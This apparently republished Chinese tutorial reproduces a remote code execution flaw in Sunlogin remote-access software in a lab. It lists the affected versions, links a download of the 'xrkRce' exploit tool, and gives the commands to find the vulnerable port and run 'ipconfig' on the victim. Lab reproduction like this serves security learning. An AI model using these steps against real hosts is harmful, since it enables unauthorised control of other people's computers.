栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

向日葵远程代码执行漏洞复现过程

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

向日葵远程代码执行漏洞复现过程

前言

本文内容仅为技术科普,请勿用于非法用途!

一、准备测试环境

1.windows虚拟机(内网IP地址172.16.20.68)
2.kali linux (内网IP地址172.16.20.76)

二、向日葵软件

存在漏洞向日葵版本:11.1.1、10.3.0.27372、11.0.0.33162

三、工具及源码下载地址
链接:https://pan.baidu.com/s/19qBlCxvWxhOj3qJd_MVfyw
提取码:xhil
四、扫描漏洞

1.这里用的kali,所以下载linux版本,并进行解压;
注意:这里需要给解压后的文件xrkRce所有权限(777),不然会提示权限不够;

2.进行漏洞扫描,确认存在漏洞的端口;

./xrkRce -h 172.16.20.68

这里发下端口为65326;
3.现在对漏洞进行利用,进行远程命令,查看对方IP;

./xrkRce -h 172.16.20.68 -c "ipconfig" -p 65326 -t rce


注意:这里可能会提示命令【命令执行完毕,但是没有回显】,需要去开启回显【防火墙-高级设置-出站规则-回显】

更多安全分享,请关注【安全info】微信公众号!

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/748751.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号